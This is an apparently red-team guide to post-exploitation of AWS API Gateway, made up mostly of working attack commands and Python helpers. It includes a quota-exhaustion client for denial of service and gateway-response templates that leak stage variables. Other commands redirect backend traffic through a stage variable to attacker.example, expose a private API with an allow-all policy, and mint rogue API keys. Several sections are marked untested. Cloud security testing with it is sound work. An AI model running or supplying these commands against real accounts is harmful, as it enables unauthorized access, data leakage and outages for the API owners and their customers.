AWS - API Gateway Post Exploitation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!


API Gateway

For more information check:

AWS - API Gateway Enum

Access unexposed APIs

Private REST APIs (endpoint type PRIVATE) can only be invoked through an interface VPC endpoint for the execute-api service. If you can create one (https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint, service com.amazonaws.us-east-1.execute-api) in a VPC where you already have a foothold (for example an EC2 instance), attach a security group that allows inbound 443 from that instance and then call the private API from it. With private DNS enabled on the endpoint the normal invoke URL resolves to it; otherwise use the endpoint-specific hostname https://{rest-api-id}-{vpce-id}.execute-api.us-east-1.amazonaws.com/{stage}, or send the request to the endpoint's DNS name with the Host header set to {rest-api-id}.execute-api.us-east-1.amazonaws.com.

Caveat: a private API must carry a resource policy that allows execute-api:Invoke, and that policy normally restricts callers with aws:SourceVpce or aws:SourceVpc. If it pins specific endpoint IDs, requests through your new endpoint get a 403 unless you can also rewrite the policy (apigateway:UpdateRestApi on /policy, see below).
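Before spending time on the endpoint it is worth reading the API's resource policy and deciding whether a self-created endpoint would even be accepted. The following Python is an added example, not code from the original page: it evaluates the aws:SourceVpce / aws:SourceVpc conditions of a policy (as returned in the policy field of aws apigateway get-rest-api, which is a JSON string and sometimes double-escaped) against an endpoint/VPC pair, and builds the endpoint-specific invoke URL. Both policies, the endpoint ID vpce-attacker and the VPC ID are constructed placeholders.

```python
"""Will a VPC endpoint you create yourself be allowed to invoke a private
REST API? (added example, not from the original page)

Evaluates the aws:SourceVpce / aws:SourceVpc conditions in the API's
resource policy, taken from the `policy` field of `aws apigateway
get-rest-api` (a JSON string, sometimes double-escaped). The policies below
are constructed samples; the endpoint and VPC ids are placeholders.
"""
import json

# Constructed: the common private-API policy, Allow everything but Deny any
# caller not coming through one pinned endpoint.
POLICY_PINNED = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "execute-api:Invoke",
         "Resource": "execute-api:/*"},
        {"Effect": "Deny", "Principal": "*", "Action": "execute-api:Invoke",
         "Resource": "execute-api:/*",
         "Condition": {"StringNotEquals": {"aws:SourceVpce": "vpce-0123456789abcdef0"}}},
    ],
})

# Constructed: a policy that trusts a whole VPC, so any endpoint in it works.
POLICY_VPC = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "execute-api:Invoke",
         "Resource": "execute-api:/*",
         "Condition": {"StringEquals": {"aws:SourceVpc": "vpc-0a1b2c3d"}}},
    ],
})


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _condition(statement: dict, key: str):
    """(operator, values) for a condition key, matched case-insensitively."""
    for operator, pairs in (statement.get("Condition") or {}).items():
        for name, value in pairs.items():
            if name.lower() == key.lower():
                return operator, [str(v) for v in _as_list(value)]
    return None, []


def _statement_matches(statement: dict, vpce_id: str, vpc_id: str) -> bool:
    """True if the statement's VPC conditions match a caller using vpce_id in
    vpc_id. Statements without VPC conditions match unconditionally."""
    match = True
    for key, ours in (("aws:SourceVpce", vpce_id), ("aws:SourceVpc", vpc_id)):
        operator, values = _condition(statement, key)
        if operator is None:
            continue
        hit = ours in values
        # StringEquals requires membership, StringNotEquals requires absence
        match = match and (hit if operator.startswith("StringEquals") else not hit)
    return match


def new_endpoint_allowed(policy_json, vpce_id: str, vpc_id: str) -> dict:
    """Explicit Deny wins; otherwise any matching Allow grants execute-api:Invoke."""
    policy = policy_json
    while isinstance(policy, str):          # undo one or two levels of escaping
        policy = json.loads(policy)
    allowed = False
    why = "no Allow statement matches; UpdateRestApi on /policy would be needed"
    for st in _as_list(policy.get("Statement", [])):
        actions = {a.lower() for a in _as_list(st.get("Action", []))}
        if not actions & {"execute-api:invoke", "execute-api:*", "*"}:
            continue
        if not _statement_matches(st, vpce_id, vpc_id):
            continue
        if st.get("Effect") == "Deny":
            return {"allowed": False, "reason": f"explicit Deny matches: {st.get('Condition')}"}
        if st.get("Effect") == "Allow":
            allowed, why = True, f"Allow matches: {st.get('Condition') or 'unconditional'}"
    return {"allowed": allowed, "reason": why}


def invoke_url(api_id: str, vpce_id: str, region: str, stage: str) -> str:
    """Endpoint-specific hostname for calling a private API through a VPC
    endpoint that does not have private DNS enabled."""
    return f"https://{api_id}-{vpce_id}.execute-api.{region}.amazonaws.com/{stage}"


if __name__ == "__main__":
    mine = "vpce-attacker"                      # placeholder for the endpoint you created
    print(new_endpoint_allowed(POLICY_PINNED, mine, "vpc-0a1b2c3d"))
    print(new_endpoint_allowed(POLICY_VPC, mine, "vpc-0a1b2c3d"))
    print(invoke_url("a1b2c3d4e5", mine, "us-east-1", "Prod"))
```

The pinned policy is the shape the console generates for private APIs, and it is exactly the case where creating your own endpoint is useless on its own: the Deny with StringNotEquals on aws:SourceVpce fires for every endpoint except the listed one. The check deliberately only reasons about VPC conditions; a policy that also restricts Principal or source IP will need a manual read.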

Usage Plans DoS

In the Enumeration section you can see how to obtain the usage plan attached to an API key (get-usage-plans, get-usage-plan-keys) and how much of its quota has already been consumed (get-usage). If you hold the key value and the plan has a quota of X requests per day, week or month, you can burn the remaining quota yourself; every legitimate client sharing that key then receives HTTP 429 ({"message":"Limit Exceeded"}, the default QUOTA_EXCEEDED gateway response) until the period resets. Two details matter: stay under the plan's throttle (rateLimit/burstLimit), otherwise you are throttled ({"message":"Too Many Requests"}, the THROTTLED response) long before the quota is used up, and remember that a key is usually issued per customer, so the outage is scoped to that customer's quota rather than the whole API.

The API key just needs to be sent in an HTTP header called x-api-key (the method must have apiKeyRequired set; if the API's apiKeySource is AUTHORIZER the key is taken from the authorizer's usageIdentifierKey instead of the header).
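As an added example (not from the original page), a small Python client that reads the quota and throttle from the JSON that aws apigateway get-usage-plan returns, the key's remaining requests from aws apigateway get-usage (items maps key id to a list of [used, remaining] data points), paces requests under the throttle rate, and stops when the quota 429 appears rather than a throttling 429. The two JSON samples, the invoke URL and the key value are constructed placeholders.

```python
"""Usage-plan exhaustion client (added example, not from the original page).

Assumes the JSON shapes returned by `aws apigateway get-usage-plan` and
`aws apigateway get-usage` (items -> {keyId: [[used, remaining], ...]}),
and that the target method only checks x-api-key. The sample JSON below is
constructed for illustration.
"""
import json
import time
import urllib.error
import urllib.request

# Constructed sample of `get-usage-plan` output for a plan with a daily quota.
SAMPLE_PLAN = {
    "id": "abc123",
    "quota": {"limit": 1000, "offset": 0, "period": "DAY"},
    "throttle": {"rateLimit": 10.0, "burstLimit": 20},
}

# Constructed sample of `get-usage` output: one data point per day of the
# requested range, each [used, remaining].
SAMPLE_USAGE = {
    "usagePlanId": "abc123",
    "items": {"key-1111": [[120, 880], [700, 300]], "key-2222": [[0, 1000]]},
}


def remaining_quota(usage: dict, key_id: str) -> int:
    """Remaining requests for key_id in the current period (latest data point)."""
    points = usage.get("items", {}).get(key_id)
    if not points:
        raise KeyError(f"no usage data for key {key_id}")
    used, remaining = points[-1]
    return int(remaining)


def request_interval(plan: dict) -> float:
    """Seconds to wait between requests to stay under the throttle rateLimit.

    Requests above rateLimit are rejected with a throttling 429 and are not
    what burns the quota, so pacing is what makes exhaustion reliable.
    """
    throttle = plan.get("throttle") or {}
    rate = float(throttle.get("rateLimit", 0) or 0)
    return 0.0 if rate <= 0 else 1.0 / rate


def classify_429(body: bytes) -> str:
    """Tell quota exhaustion apart from throttling by the default gateway
    response bodies (QUOTA_EXCEEDED -> "Limit Exceeded",
    THROTTLED -> "Too Many Requests")."""
    try:
        message = json.loads(body.decode() or "{}").get("message", "")
    except (ValueError, UnicodeDecodeError, AttributeError):
        message = ""
    if "Limit Exceeded" in message:
        return "quota"
    if "Too Many Requests" in message:
        return "throttle"
    return "unknown"


def exhaust(url: str, api_key: str, budget: int, interval: float) -> dict:
    """Send requests with x-api-key until the quota 429 appears or budget runs out."""
    sent = 0
    outcome = "budget_exhausted"
    while sent < budget:
        req = urllib.request.Request(url, headers={"x-api-key": api_key})
        try:
            with urllib.request.urlopen(req, timeout=10):
                pass
        except urllib.error.HTTPError as err:
            if err.code == 429:
                if classify_429(err.read()) == "quota":
                    outcome = "quota_exhausted"
                    break
                # throttled: back off and retry the same slot
                time.sleep(max(interval, 1.0))
                continue
            # other 4xx/5xx responses were still accepted by the gateway and
            # counted against the key, so keep going
        sent += 1
        time.sleep(interval)
    return {"sent": sent, "outcome": outcome}


if __name__ == "__main__":
    key_id = "key-1111"                                  # placeholder key id
    left = remaining_quota(SAMPLE_USAGE, key_id)
    print(f"{left} requests left, pacing at {request_interval(SAMPLE_PLAN):.2f}s")
    # Replace with the real invoke URL and the key *value* (not its id):
    # exhaust("https://<api-id>.execute-api.us-east-1.amazonaws.com/Prod/items",
    #         "<key-value>", left + 1, request_interval(SAMPLE_PLAN))
```

get-usage needs --start-date/--end-date in YYYY-MM-DD; the last data point of the range is the current period. The budget passed to exhaust is the remaining count plus one so the loop observes the QUOTA_EXCEEDED response instead of stopping one request short.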

apigateway:UpdateGatewayResponse, apigateway:CreateDeployment

An attacker with the permissions apigateway:UpdateGatewayResponse and apigateway:CreateDeployment can modify an existing gateway response (the responses API Gateway generates itself, such as DEFAULT_4XX, DEFAULT_5XX, ACCESS_DENIED or UNAUTHORIZED). Response templates (/responseTemplates/<content-type>) control the body and can expand $context variables and $stageVariables, so an error page can be made to leak the request context (e.g. $context.error.validationErrorString, $context.authorizer.<key>) or stage variables, which often hold backend hostnames, Lambda aliases or credentials. Response parameters (/responseParameters/gatewayresponse.header.<Name>) set headers, for example a permissive Access-Control-Allow-Origin. If a text/html template is configured (templates are selected by the client's Accept header), the body can carry script that runs in the victim's browser. Gateway responses are part of the API definition, so the change is only served after a new deployment to the stage.

API_ID="your-api-id"
RESPONSE_TYPE="DEFAULT_4XX"

# Patch operations in JSON form: the shorthand parser chokes on the commas and
# braces inside the template, and the quoted heredoc keeps the shell from
# expanding $context / $stageVariables. "backend" is a placeholder stage
# variable name; enumerate the real ones with get-stage.
cat > patch.json <<'EOF'
[
  {"op": "replace", "path": "/responseTemplates/application~1json",
   "value": "{\"message\":\"$context.error.message\",\"apiKey\":\"$context.identity.apiKey\",\"backend\":\"$stageVariables.backend\"}"},
  {"op": "add", "path": "/responseParameters/gatewayresponse.header.Access-Control-Allow-Origin",
   "value": "'*'"}
]
EOF

# Update the gateway response
aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RESPONSE_TYPE --patch-operations file://patch.json

# Create a deployment so the modified response is served from the stage
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Leakage of stage variables and request context through error responses, header injection (e.g. CORS relaxation), script injection in HTML error pages.

Need testing

apigateway:UpdateStage, apigateway:CreateDeployment

An attacker with the permissions apigateway:UpdateStage and apigateway:CreateDeployment can change stage settings, which apply to the stage directly without a new deployment: point the stage at an older deployment (/deploymentId), rewrite stage variables (/variables/<name>) that integrations reference as ${stageVariables.<name>} in Lambda ARNs or backend URLs, disable access and execution logging (/accessLogSettings, /*/*/logging/loglevel), or turn on a response cache. API Gateway keys cache entries on the request path plus any configured cache key parameters, not on the caller, so unless the integration lists an identity header such as Authorization in cacheKeyParameters, one client can be served another client's cached response. apigateway:CreateDeployment is only needed on top of this when resources, methods or integrations were changed too.

API_ID="your-api-id"
STAGE_NAME="Prod"

# Enable a shared response cache on every method of the stage (one shorthand
# item per patch operation, separated by spaces, not commas)
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/cacheClusterEnabled,value=true op=replace,path=/cacheClusterSize,value=0.5 'op=replace,path=/*/*/caching/enabled,value=true'

# Point a stage variable used by the integrations at another backend
# ("backendUrl" is a placeholder name; list the real ones with get-stage)
aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --patch-operations op=replace,path=/variables/backendUrl,value=https://attacker.example

# Only required if resources, methods or integrations were also modified
aws apigateway create-deployment --rest-api-id $API_ID --stage-name $STAGE_NAME

Potential Impact: Cross-user disclosure of cached responses, serving a stale or vulnerable deployment, redirecting backend traffic through a stage variable, blinding logging.

Need testing
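To decide whether an enabled cache is actually shared across callers, and to produce the update-stage patch operations in the JSON form the CLI accepts, here is an added Python example (not from the original page). It assumes the JSON shapes of aws apigateway get-stage (methodSettings keyed by the resource path with / escaped as ~1, then /METHOD) and aws apigateway get-integration (cacheKeyParameters); the stage and integration documents and the stage variable name are constructed placeholders.

```python
"""Stage-cache abuse helpers (added example, not from the original page).

Assumes the JSON shapes of `aws apigateway get-stage` (methodSettings keyed
by "resource~1path/METHOD") and `aws apigateway get-integration`
(cacheKeyParameters). The sample documents below are constructed.
"""
import json

# Constructed `get-stage` output: caching on for every method, 5 min TTL,
# explicitly off for GET /admin/users.
SAMPLE_STAGE = {
    "stageName": "Prod",
    "cacheClusterEnabled": True,
    "cacheClusterSize": "0.5",
    "methodSettings": {
        "*/*": {"cachingEnabled": True, "cacheTtlInSeconds": 300,
                "cacheDataEncrypted": False},
        "~1admin~1users/GET": {"cachingEnabled": False},
    },
}

# Constructed `get-integration` output for GET /me: the cache key only
# contains the path, not the caller's Authorization header.
SAMPLE_INTEGRATION_SHARED = {"type": "AWS_PROXY", "cacheKeyParameters": []}
SAMPLE_INTEGRATION_KEYED = {
    "type": "AWS_PROXY",
    "cacheKeyParameters": ["method.request.header.Authorization"],
}

# Request parameters that tie a cached entry to a caller.
IDENTITY_PARAMS = {
    "method.request.header.authorization",
    "method.request.header.x-api-key",
    "method.request.header.cookie",
}


def method_setting_key(resource_path: str, http_method: str) -> str:
    """Build the methodSettings key: '/' in the path is escaped as '~1'."""
    escaped = resource_path.replace("~", "~0").replace("/", "~1")
    return f"{escaped}/{http_method.upper()}"


def caching_enabled(stage: dict, resource_path: str, http_method: str) -> bool:
    """Effective caching flag: a per-method setting overrides the '*/*' default."""
    if not stage.get("cacheClusterEnabled"):
        return False
    settings = stage.get("methodSettings", {})
    specific = settings.get(method_setting_key(resource_path, http_method))
    if specific is not None and "cachingEnabled" in specific:
        return bool(specific["cachingEnabled"])
    return bool(settings.get("*/*", {}).get("cachingEnabled", False))


def shared_cache(stage: dict, integration: dict, resource_path: str, http_method: str) -> bool:
    """True when responses are cached and the cache key carries no caller
    identity, i.e. one caller can receive another caller's cached response."""
    if not caching_enabled(stage, resource_path, http_method):
        return False
    keys = {k.lower() for k in integration.get("cacheKeyParameters", [])}
    return not (keys & IDENTITY_PARAMS)


def enable_cache_patch(size: str = "0.5", ttl: int = 3600) -> list:
    """update-stage patch operations that turn on a shared cache for every
    method (paths as documented for the UpdateStage API)."""
    return [
        {"op": "replace", "path": "/cacheClusterEnabled", "value": "true"},
        {"op": "replace", "path": "/cacheClusterSize", "value": size},
        {"op": "replace", "path": "/*/*/caching/enabled", "value": "true"},
        {"op": "replace", "path": "/*/*/caching/ttlInSeconds", "value": str(ttl)},
    ]


def backend_redirect_patch(variable: str, new_value: str) -> list:
    """Point a stage variable (used as ${stageVariables.<name>} in Lambda ARNs
    or HTTP backend URLs) at a target of the attacker's choosing."""
    return [{"op": "replace", "path": f"/variables/{variable}", "value": new_value}]


if __name__ == "__main__":
    print("GET /me shared:", shared_cache(SAMPLE_STAGE, SAMPLE_INTEGRATION_SHARED, "/me", "GET"))
    print("GET /me keyed: ", shared_cache(SAMPLE_STAGE, SAMPLE_INTEGRATION_KEYED, "/me", "GET"))
    # Feed to: aws apigateway update-stage --rest-api-id <id> --stage-name Prod \
    #              --patch-operations "$(python3 this_script.py)"
    print(json.dumps(enable_cache_patch()))
    print(json.dumps(backend_redirect_patch("backendUrl", "https://attacker.example")))
```

The identity header set is a heuristic; an API that keys responses on a custom header or query string carrying a tenant id would need that parameter added to IDENTITY_PARAMS. Enabling the cache cluster takes a few minutes to provision, and the cached data is only encrypted at rest when cacheDataEncrypted is set, which the patch above does not touch.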

apigateway:PutMethodResponse, apigateway:CreateDeployment

An attacker with the permissions apigateway:PutMethodResponse and apigateway:CreateDeployment can modify the method response of an existing REST API method. A method response only declares which status codes, headers (method.response.header.<Name>) and models a method may return; the actual header values and body come from the integration response mapping (put-integration-response with --response-parameters and --response-templates). So with PutMethodResponse alone the attacker can whitelist new headers or loosen the response model, while combined with apigateway:PutIntegrationResponse they can inject headers or rewrite the body returned to clients (a template that reflects request data into an HTML response is script injection). With proxy integrations (AWS_PROXY, HTTP_PROXY) the backend response passes through untouched and these mappings are not applied.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
STATUS_CODE="200"

# Declare an extra response header on the method (the boolean only marks the
# header as allowed; its value is set in the integration response)
aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --status-code $STATUS_CODE --response-parameters "method.response.header.malicious_header=true"

# Create a deployment so the changed method definition reaches the stage
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: With the matching integration response mapping, header injection and body tampering in API responses; on its own, a change to the method's response contract that other changes can build on.

Need testing

apigateway:UpdateRestApi, apigateway:CreateDeployment

An attacker with the permissions apigateway:UpdateRestApi and apigateway:CreateDeployment can change REST API level settings. Logging and TLS are not among them (logging is a stage setting, and the minimum TLS version is the securityPolicy of a custom domain name, changed with update-domain-name), but the patchable paths do include /policy (the resource policy that, for example, restricts a private API to certain VPC endpoints), /endpointConfiguration/types (turn a PRIVATE API into a REGIONAL one reachable from the internet), /disableExecuteApiEndpoint (re-enable the default execute-api hostname when the owner only wanted the API reachable through a custom domain) and /apiKeySource. The changes take effect on a stage after a new deployment.

API_ID="your-api-id"

# Make a private API public and re-enable the default execute-api endpoint
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=replace,path=/endpointConfiguration/types/PRIVATE,value=REGIONAL op=replace,path=/disableExecuteApiEndpoint,value=false

# Replace the resource policy with one that lets anyone invoke the API
# (JSON form, since the policy itself contains commas and braces)
aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations '[{"op":"replace","path":"/policy","value":"{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Allow\",\"Principal\":\"*\",\"Action\":\"execute-api:Invoke\",\"Resource\":\"execute-api:/*\"}]}"}]'

# Create a deployment so the new settings apply to the stage
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potential Impact: Exposing a private API to the internet, removing resource policy restrictions, or re-enabling a default endpoint the owner intended to hide.

Need testing

apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan, apigateway:CreateUsagePlanKey

An attacker with permissions apigateway:CreateApiKey, apigateway:UpdateApiKey, apigateway:CreateUsagePlan and apigateway:CreateUsagePlanKey can mint their own API keys and attach them to a usage plan that covers the target API stage. A key is only accepted for a method that has apiKeyRequired set, and only when the key belongs to a usage plan associated with that API's stage, so the plan has to be created (or updated) with --api-stages. API keys are a metering and throttling control, not authentication: if the method also uses an IAM, Cognito or Lambda authorizer, the key alone does not get you in. With only apigateway:CreateUsagePlanKey, an attacker can likewise add a key they already control (or a leaked one) to an existing plan.

API_ID="your-api-id"
STAGE_NAME="Prod"

# Create a new API key and capture both its id (for the usage plan) and its
# value (what goes in the x-api-key header)
read -r API_KEY_ID API_KEY_VALUE <<<"$(aws apigateway create-api-key --name attacker-key --enabled --output text --query '[id,value]')"

# Create a usage plan covering the target API stage (without --api-stages the key would be rejected for that API)
USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --api-stages apiId=$API_ID,stage=$STAGE_NAME --output text --query 'id')

# Associate the API key with the usage plan
aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY_ID --key-type API_KEY
# $API_KEY_VALUE can now be sent as x-api-key to methods of $API_ID/$STAGE_NAME that require a key

Potential Impact: Unauthorized access to API methods that rely on API keys alone, bypassing the owner's key distribution and metering.

Need testing
